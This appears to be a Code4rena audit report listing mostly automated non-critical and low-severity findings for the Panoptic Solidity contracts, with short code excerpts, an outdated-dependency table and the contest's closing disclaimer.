Some arguments are never used: if this is intentional, consider removing these arguments from the function. Otherwise, implement the missing logic accordingly.
There are 8 instances of this issue.
Consider removing any unusued state variable to improve the readability of the codebase.
There are 2 instances of this issue.
These contracts import some OpenZeppelin libraries, but they are using an old version.
There are 5 instances of this issue.
Keeping the same constants in different files may cause some problems, as the values could become out of sync when only one location is updated; reading constants from a single file is preferable. This should also be preferred for gas optimizations.
There are 4 instances of this issue.
Consider using an enum instead of hardcoding an index access to make the code easier to understand.
There are 26 instances of this issue.
It's not necessary to initialize a variable with a zero value, as it's the default behaviour, and it's actually worse in gas terms as it adds an overhead.
There are 31 instances of this issue.
These statements should be refactored to a separate function, as there are multiple parts of the codebase that use the same logic, to improve the code readability and reduce code duplication.
There are 5 instances of this issue.
Some parts of the codebase use require
statements, while others use custom error
s. Consider refactoring the code to use the same approach: the following findings represent the minority of require
vs error
, and they show the first occurance in each file, for brevity.
There is 1 instance of this issue.
File: contracts/libraries/Math.sol
361: require(denominator > 0);
[361]
These functions might be a problem if the logic changes before the contract is deployed, as the developer must remember to syncronize the logic between all the function instances.
Consider using a single function instead of duplicating the code, for example by using a library
, or through inheritance.
There are 2 instances of this issue.
Consider limiting the number of iterations in loops with an explicit revert reason to avoid iterating an array that is too large.
The function would eventually revert if out of gas anyway, but by limiting it the user avoids wasting too much gas, as the loop doesn't execute if an excessive value is provided.
There are 34 instances of this issue.
Those functions should be declared as external
instead of public
, as they are never called internally by the contract.
Contracts are allowed to override their parents' functions and change the visibility from external to public.
There are 13 instances of this issue.
Use a scientific notation rather than decimal literals (e.g. 1e6
instead of 1000000
), for better code readability.
There are 7 instances of this issue.
Use a scientific notation rather than exponentiation (e.g. 1e18
instead of 10**18
): although the compiler is capable of optimizing it, it is considered good coding practice to utilize idioms that don't rely on compiler optimization, whenever possible.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
234: totalSupply = 10 ** 6;
[234]
Large hardcoded numbers in code can be difficult to read. Consider using underscores for number literals to improve readability (e.g 1234567
-> 1_234_567
). Consider using an underscore for every third digit from the right.
There are 5 instances of this issue.
Consider refactoring the following code, as double casting is confusing, and, in some scenarios, it may introduce unexpected truncations or rounding issues.
Furthermore, double type casting can make the code less readable and harder to maintain, increasing the likelihood of errors and misunderstandings during development and debugging.
There are 67 instances of this issue.
The using-for
syntax is the more common way of calling library functions.
There are 460 instances of this issue.
This allows for bugs to be fixed in production, at the expense of significantly increasing centralization.
There are 20 instances of this issue.
External protocols should be monitored as such dependencies may introduce vulnerabilities if a vulnerability is found in the external protocol.
There are 19 instances of this issue.
Remove debug imports, as they increase the contract size, and they are useful only for local tests.
There is 1 instance of this issue.
File: contracts/PanopticPool.sol
22: import "forge-std/console.sol";
[22]
Earlier versions of solidity can use uint<n>(-1)
instead. Expressions not including the - 1
can often be re-written to accomodate the change (e.g. by using a >
rather than a >=
, which will also save some gas).
There are 44 instances of this issue.
Constants should be defined instead of using magic numbers.
There are 285 instances of this issue.
Assign the expression's parts to intermediate local variables, and check against those instead.
There are 23 instances of this issue.
Consider splitting long arithmetic calculations into multiple steps to improve the code readability.
There are 53 instances of this issue.
There are units for seconds, minutes, hours, days, and weeks, and since they're defined, they should be used
There are 3 instances of this issue.
This is a best practice that should be followed.
There are 120 instances of this issue.
Consider grouping all the system constants under a single file. This finding shows only the first constant for each file, for brevity.
There are 10 instances of this issue.
Use a more recent version of Solidity: it's safer to use at least the version 0.8.19 to get the latest bugfixes and features when deploying on L2.
There are 20 instances of this issue.
Locking the pragma helps avoid accidental deploys with an outdated compiler version that may introduce bugs and unexpected vulnerabilities.
Floating pragma is meant to be used for libraries and contracts that have external users and need backward compatibility.
There are 9 instances of this issue.
Like the zero-address check, an empty bytes assignment might be undesiderable, but the following functions don't have it.
There is 1 instance of this issue.
File: contracts/SemiFungiblePositionManager.sol
// @audit positionKey
1111: function _updateStoredPremia(
1112: bytes32 positionKey,
1113: LeftRightUnsigned currentLiquidity,
1114: LeftRightUnsigned collectedAmounts //@audit-ok was signed
Starting from version 0.8.4
, the recommended approach for appending bytes is to use bytes.concat
instead of abi.encodePacked
.
There are 5 instances of this issue.
All external
/public
functions should override an interface
. This is useful to make sure that the whole API is extracted.
There are 85 instances of this issue.
If a transaction reverts, it can be confusing to debug if there aren't any messages. Add a descriptive message to all require
/revert
statements.
There are 9 instances of this issue.
Consider moving the logic outside the else
block, and then removing it (it's not required, as the function is returning a value). There will be one less level of nesting, which will improve the quality of the codebase.
There are 5 instances of this issue.
[N-44] Multiple address
/ID mappings can be combined into a single mapping of an address
/ID to a struct
, for readability
Well-organized data structures make code reviews easier, which may lead to fewer bugs. Consider combining related mappings into mappings to structs, so it's clear what data is related.
There are 4 instances of this issue.
It is better to use import {<identifier>} from "<file.sol>"
instead of import "<file.sol>"
to improve readability and speed up the compilation time.
There is 1 instance of this issue.
File: contracts/PanopticPool.sol
22: import "forge-std/console.sol";
[22]
The contract's interface should be imported first, followed by each of the interfaces it uses, followed by all other files. The examples below do not follow this layout.
There are 4 instances of this issue.
Consider using bitshifts instead of a bitmap if the value is a power of 2 and the variable is constant, to improve the code readability.
There is 1 instance of this issue.
File: contracts/libraries/Constants.sol
10: uint256 internal constant FP96 = 0x1000000000000000000000000;
[10]
If a function has too many parameters, replacing them with a struct can improve code readability and maintainability, increase reusability, and reduce the likelihood of errors when passing the parameters.
There are 42 instances of this issue.
The following functions are missing some parameters when emitting an event: when dealing with a source address which uses the value of msg.sender
, the msg.sender
value should be specified in every event.
Otherwise, a contract or web page listening to events cannot react to connected users: basically, those events cannot be used properly.
There are 9 instances of this issue.
Events are generally emitted when sensitive changes are made to the contracts.
However, some are missing important parameters, as they should include both the new value and old value where possible.
There are 2 instances of this issue.
If a reentrancy occurs, some events may be emitted in an unexpected order, and this may be a problem if a third party expects a specific order for these events. Ensure that events follow the best practice of CEI.
There are 8 instances of this issue.
A duplicated function name in the same contract might have problems with automated auditing tools, so it should be avoided. Consider always using a different name for functions to improve the readability of the code.
There are 15 instances of this issue.
It is unusual to have external calls in modifiers, and doing so will make reviewers more likely to miss important external interactions. Consider moving the external call to an internal function, and calling that function from the modifier.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
170: if (msg.sender != address(s_panopticPool)) revert Errors.NotPanopticPool();
[170]
Consider adding some parameters to the error to indicate which user or values caused the failure.
There are 34 instances of this issue.
Variables which are not constants or immutable should not be declared in all uppercase.
There are 2 instances of this issue.
This is useful to avoid doing some typo bugs.
There are 119 instances of this issue.
The delete
keyword more closely matches the semantics of what is being done, and draws more attention to the changing of state, which may lead to a more thorough audit of its associated logic.
There are 5 instances of this issue.
Consider preventing a contract's tokens from being transferred to the contract itself.
There are 3 instances of this issue.
The if
/else
statement can be written in a shorthand way using the ternary operator, as it increases readability and reduces the number of lines of code.
There are 3 instances of this issue.
Using named returns makes the code more self-documenting, makes it easier to fill out NatSpec, and in some cases can save gas. The cases below are where there currently is at most one return statement, which is ideal for named returns.
There are 103 instances of this issue.
This is a best practice that should be followed.
Inside each contract, library or interface, use the following order:
- Type declarations
- State variables
- Events
- Errors
- Modifiers
- Functions
There are 6 instances of this issue.
This is a best practice that should be followed.
Functions should be grouped according to their visibility and ordered:
- constructor
- receive function (if exists)
- fallback function (if exists)
- external
- public
- internal
- private
Within a grouping, place the view and pure functions last.
There are 56 instances of this issue.
Consider splitting long functions into multiple, smaller functions to improve the code readability.
There are 33 instances of this issue.
This will decrease the probability of making typos, and the code will be more readable
There are 5 instances of this issue.
Maximum suggested line length is 120 characters according to the documentation.
There are 346 instances of this issue.
Consider always adding an explicit visibility modifier for variables, as the default is internal
.
There are 8 instances of this issue.
This can help to prevent hackers from using stolen tokens, but as a side effect it will increase the project centralization.
There are 3 instances of this issue.
Starting with Solidity version 0.8.8, using the override keyword when the function solely overrides an interface function, and the function doesn't exist in multiple base contracts, is unnecessary.
There are 4 instances of this issue.
Consider adding a comment with the variable name even if it's not used, to improve the code readability.
There are 2 instances of this issue.
Avoid typos, and proper nouns should be capitalized.
There are 86 instances of this issue.
A 100% test coverage is not foolproof, but it helps immensely in reducing the amount of bugs that may occur.
This includes: large code bases, or code with lots of inline-assembly, complicated math, or complicated interactions between multiple contracts.
Invariant fuzzers such as Echidna require the test writer to come up with invariants which should not be violated under any circumstances, and the fuzzer tests various inputs and function calls to ensure that the invariants always hold.
Even code with 100% code coverage can still have bugs due to the order of the operations a user performs, and invariant fuzzers may help significantly.
Formal verification is the act of proving or disproving the correctness of intended algorithms underlying a system with respect to a certain formal specification/property/invariant, using formal methods of mathematics.
Some tools that are currently available to perform these tests on smart contracts are SMTChecker and Certora Prover.
Some lines use // x
and some use //x
. The instances below point out the usages that don't follow the majority, within each file.
There are 105 instances of this issue.
Consider adding some comments on critical state variables to explain what they are supposed to do: this will help for future code reviews.
There are 3 instances of this issue.
Large and/or complex functions should have more comments to better explain the purpose of each logic step.
There are 24 instances of this issue.
Low-level languages like assembly should require extensive documentation and comments to clarify the purpose of each instruction.
There are 3 instances of this issue.
@inheritdoc
Copies all missing tags from the base function. Documentation
There are 4 instances of this issue.
Use mixedCase. Examples: onlyBy, onlyAfter, onlyDuringThePreSale
. Documentation
There is 1 instance of this issue.
File: contracts/SemiFungiblePositionManager.sol
305: modifier ReentrancyLock(uint64 poolId) {
[305]
Use mixedCase
for local and state variables that are not constants, and add a trailing underscore for non-external variables. Documentation
There are 52 instances of this issue.
This convention is suggested for non-external functions (private or internal). Documentation
There are 104 instances of this issue.
This convention is suggested for non-external state variables (private or internal). Documentation
There are 36 instances of this issue.
NatSpec must begin with ///
, or use the /* ... */
syntax.
There are 3 instances of this issue.
Some contracts miss a @dev/@notice
NatSpec, which should be a best practice to add as a documentation.
There is 1 instance of this issue.
File: contracts/tokens/interfaces/IDonorNFT.sol
6: interface IDonorNFT {
[6]
Some contract definitions have an incomplete NatSpec: add a @author
notation to improve the code documentation.
There is 1 instance of this issue.
File: contracts/tokens/interfaces/IDonorNFT.sol
6: interface IDonorNFT {
[6]
Some contract definitions have an incomplete NatSpec: add a @dev
notation to describe the contract to improve the code documentation.
There are 11 instances of this issue.
Some contract definitions have an incomplete NatSpec: add a @notice
notation to describe the contract to improve the code documentation.
There are 5 instances of this issue.
Some contract definitions have an incomplete NatSpec: add a @title
notation to describe the contract to improve the code documentation.
There are 2 instances of this issue.
Some errors have an incomplete NatSpec: add a @dev
notation to describe the error to improve the code documentation.
There are 33 instances of this issue.
Some errors have an incomplete NatSpec: add a @param
notation to describe the error parameters to improve the code documentation.
There are 34 instances of this issue.
Some events have an incomplete NatSpec: add a @dev
notation to describe the event to improve the code documentation.
There are 11 instances of this issue.
Some modifiers have an incomplete NatSpec: add a @dev
notation to describe the modifier to improve the code documentation.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
169: modifier onlyPanopticPool() {
[169]
Some modifiers have an incomplete NatSpec: add a @param
notation to describe the modifier parameters to improve the code documentation.
There is 1 instance of this issue.
File: contracts/CollateralTracker.sol
169: modifier onlyPanopticPool() {
[169]
Some functions have an incomplete NatSpec: add a @dev
notation to describe the function to improve the code documentation.
There are 142 instances of this issue.
Some functions have an incomplete NatSpec: add a @notice
notation to describe the function to improve the code documentation.
There are 3 instances of this issue.
Some functions have an incomplete NatSpec: add a @param
notation to describe the function parameters to improve the code documentation.
There are 19 instances of this issue.
Some functions have an incomplete NatSpec: add a @return
notation to describe the function return value to improve the code documentation.
There are 8 instances of this issue.
Some branches are hard-coded with constants: for example, in the following case SLOW_ORACLE_UNISWAP_MODE
is hardcoded to false, so the first part of the branch can never execute.
There is 1 instance of this issue.
File: contracts/PanopticPool.sol
914: if (SLOW_ORACLE_UNISWAP_MODE) {
915: slowOracleTick = PanopticMath.computeMedianObservedPrice(
916: _univ3pool,
917: observationIndex,
918: observationCardinality,
919: SLOW_ORACLE_CARDINALITY,
920: SLOW_ORACLE_PERIOD
921: );
922: } else {
923: (slowOracleTick, medianData) = PanopticMath.computeInternalMedian(
924: observationIndex,
925: observationCardinality,
926: MEDIAN_PERIOD,
927: s_miniMedian, //@audit-info does not update?
928: _univ3pool
929: );
930: }
[914-L930]
The inclusion of a transaction expiration check provides a safeguard for users against swapping tokens at a price that is lower than the current market price, but there isn't a check for a deadline, so users can be sandwiched by a MEV bot.
This can happen when the transaction remains in the mempool for a period of time because the gas cost paid by the transaction is lower than the current gas price.
There is 1 instance of this issue.
File: contracts/SemiFungiblePositionManager.sol
838: (int256 swap0, int256 swap1) = _univ3pool.swap(
839: msg.sender,
840: zeroForOne,
841: swapAmount,
842: zeroForOne
843: ? Constants.MIN_V3POOL_SQRT_RATIO + 1
844: : Constants.MAX_V3POOL_SQRT_RATIO - 1,
845: data
846: );
[838-846]
Some tokens, such as USDT, have a different implementation for the approve function: when the address is cast to a compliant IERC20
interface and the approve function is used, it will always revert due to the interface mismatch.
There are 4 instances of this issue.
Not all IERC20
implementations (e.g. USDT, KNC) revert
when there's a failure in approve
. The function signature has a boolean return value and they indicate errors that way instead.
By not checking the return value, operations that should have marked as failed, may potentially go through without actually approving anything.
There are 4 instances of this issue.
If one of the delegatecall
consumes part of the msg.value
, other calls might fail, if they expect the full msg.value
. Consider using a different design, or fully document this decision to avoid potential issues.
There is 1 instance of this issue.
File: contracts/multicall/Multicall.sol
15: (bool success, bytes memory result) = address(this).delegatecall(data[i]);
[15]
There are some missing checks in these functions, and this could lead to unexpected scenarios. Consider always adding a sanity check for state variables.
There are 2 instances of this issue.
There are some missing checks in these functions, and this could lead to unexpected scenarios. Consider always adding a sanity check for state variables.
There are 23 instances of this issue.
The following functions can be called by any user, who may also send some funds by mistake. In that case, those funds will be lost (this also applies to delegatecalls, in case they don't use the transferred ETH).
There is 1 instance of this issue.
File: contracts/multicall/Multicall.sol
12: function multicall(bytes[] calldata data) public payable returns (bytes[] memory results) {
[12]
There are some missing limits in these functions, and this could lead to unexpected scenarios. Consider adding a min/max limit for the following values, when appropriate.
There are 2 instances of this issue.
Solidity doesn't support fractions, so divisions by large numbers could result in the quotient being zero.
To avoid this, it's recommended to require a minimum numerator amount to ensure that it is always greater than the denominator.
There are 35 instances of this issue.
This project is using a vulnerable version of some libraries, which have the following issues:
Current @openzeppelin/contracts
version: 4.6.0
Risk | Title | Min Version | Max Version |
---|---|---|---|
LOW | Denial of Service (DoS) | >=3.2.0 | <4.8.3 |
MEDIUM | Improper Input Validation | >=3.3.0 | <4.9.2 |
MEDIUM | Improper Encoding or Escaping of Output | >=4.0.0 | <4.9.3 |
HIGH | Improper Verification of Cryptographic Signature | >=0.0.0 | <4.7.3 |
MEDIUM | Denial of Service (DoS) | >=2.3.0 | <4.7.2 |
LOW | Incorrect Resource Transfer Between Spheres | >=4.6.0 | <4.7.2 |
HIGH | Incorrect Calculation | >=4.3.0 | <4.7.2 |
HIGH | Information Exposure | >=4.1.0 | <4.7.1 |
HIGH | Information Exposure | >=4.0.0 | <4.7.1 |
LOW | Missing Authorization | >=4.3.0 | <4.9.1 |
There are 5 instances of this issue.
Check for zero-address to avoid the risk of setting address(0)
for state variables when deploying.
There are 9 instances of this issue.
Check for zero-address to avoid the risk of setting address(0)
for state variables after an update.
There are 20 instances of this issue.
Flagging as best as this is the best mix of custom issues and automated findings I've seen so to me it brings the most value.
The following issues from this warden have also been considered in scoring and should be considered valid Low findings:
C4 is an open organization governed by participants in the community.
C4 audits incentivize the discovery of exploits, vulnerabilities, and bugs in smart contracts. Security researchers are rewarded at an increasing rate for finding higher-risk issues. Audit submissions are judged by a knowledgeable security researcher and solidity developer and disclosed to sponsoring developers. C4 does not conduct formal verification regarding the provided code but instead provides final verification.
C4 does not provide any guarantee or warranty regarding the security of this project. All smart contract software should be used at the sole risk and responsibility of users.